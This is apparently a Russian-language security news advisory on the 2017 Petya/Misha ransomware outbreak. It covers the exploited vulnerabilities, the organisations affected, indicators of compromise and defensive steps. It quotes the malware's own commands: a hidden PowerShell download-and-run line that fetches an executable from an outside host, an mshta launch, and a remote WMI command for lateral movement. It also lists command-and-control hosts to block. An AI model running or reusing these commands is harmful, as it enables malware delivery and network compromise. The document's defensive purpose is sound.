В Интернете новая эпидемия — новособранные вирусы-шифровальщики «Петя» (Petya) и «Миша» (Misha), распространившиеся уже по десяткам крупных компаний по всему миру.
Модель распространения отчасти аналогична WannaCry — используется эксплойт к уязвимости MS17-010, который был усилен социальной инженерией с использованием уязвимости в MS Word. Заражение происходит после открытия пользователем почтового вложения, которое эксплуатирует уязвимость CVE-2017-0199, опубликованную в апреле 2017 года. А распространение по другим компьютерам в сети уже обеспечивается целым набором техник: через интерфейс WMI, через копию программы PsExec, через уязвимость в SMB (CVE-2017-0144, MS17-010).
Компания Microsoft опубликовала подробное описание, как вредоносное ПО получает дамп паролей и использует их для подключения к административным сетевым папкам для удаленной установки ПО.
Заражение по вектору SMB идет с использованием уязвимости CVE-2017-0144 аналогично технике, использованной в WannaCry.
А вот модель шифрования существенно изменилась. «Петя», проникая на компьютер с использованием эксплойта, заражает MBR (главная загрузочная запись) системы. А дальше в систему загружается «Миша», который шифрует файлы на диске, и требует выкуп в размере $300 за один компьютер. Так же есть модификации, когда «Петя» и «Миша» работают независимо друг от друга, в зависимости от наличия привилегий администратора системы. Есть сообщения о том, то встречалась также модель распространения, использующая вредоносные вложения с маскировкой под pdf-файлы.
Этот зловредный дуэт уже отправил в нокаут множество сайтов СНГ и остановил работу множества компаний. По сообщениям СМИ в России с наибольшими проблемами столкнулись в корпорации «Роснефть», в данный момент отключены основные сайты корпорации и сайт «Башнефть». Однако однозначной информации о том, что это именно «Петя» и «Миша», пока нет. Шифровальщик еще не изучен. По словам представителей антивирусной компании «Dr. Web», шифровальщик использует иную модель распространения. Однако визуально окно вымогателя идентично с «Петей» и «Мишей».
Массовые заражения зафиксированы во Франции, Испании, России, странах СНГ. В Украине от вируса пострадали десятки государственных и коммерческих организаций.
Посмотреть на улов хакеров можно здесь: https://blockchain. info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
Злоумышленник может присылать файлы Петя. apx, myguy. exe, myguy. xls, Order-[любая дата].doc, через которые происходит заражение рабочей станции под управлением ОС Windows. Например, при открытии файла Order-[любая дата].doc происходит обращение к серверу 84.200.16.242 по порту 80 и загрузка xls: http://84.200.16.242/myguy. xls
Далее файл myguy. xls запускается с помощью%WINDIR%\System32\mshta. exe" «C:\myguy. xls. hta» и вызывает исполнение powershell-скрита, загружающего тело вредоноса:
powershell. exe -WindowStyle Hidden (New-Object System. Net. WebClient).DownloadFile(’h11p://french-cooking. com/myguy. exe’, ’%APPDATA%\10807.exe’);" (PID: [идентификатор процесса], Additional Context: ( System. Net. WebClient).DownloadFile(’h11p://french-cooking. com/myguy. exe’, ’%APPDATA%\[случайное число].exe’) ;)
Затем вредонос пытается подключиться к серверам 111.90.139.247:80 и COFFEINOFFICE. XYZ:80, которые возможно являются серверам управления.
Индикаторами компрометации является наличие файлов:
C:\Windows\perfc. dat
C:\myguy. xls. hta
После закрепления на хосте происходит сканирование других Windows машин в сети и распространение за счет уязвимостей, описанных в MS17-010 (те же, что использовал WannaCry) по портам tcp:135, tcp:139, tcp:445, tcp:1024-1035.
Распространение также можно происходить за счет выполнение команды:
Remote WMI, "process call create "C:\\Windows\\System32\\rundll32.exe \\"C:\\Windows\\perfc. dat\\" #1″
Как избежать заражения? 1) Запретить доступ по http к серверам: french-cooking. com:80 84.200.16.242:80 111.90.139.247:80 COFFEINOFFICE. XYZ:80
2) Запретить почтовые вложения и скачивание файлов с именами: Петя. apx, myguy. exe, myguy. xls, Order-[любая дата].doc
3) Установить патчи Для MS Office: https://portal. msrc. microsoft. com/en-US/security-guidance/advisory/CVE-2017-0199 Для MS Windows: https://technet. microsoft. com/en-us/library/security/ms17-010.aspx
4) Настроить IPS на блокировку эксплойтов для MS17-010
5) Для защиты еще не зараженных узлов можно создать файл c:\windows\perfc без расширения. Заражение таких узлов не происходит.
Подробности — на http://www. jetinfo. ru/stati/vredonosy-petya-petya-i-misha-misha-chto-proiskhodit-i-chto-delat-v-trekh
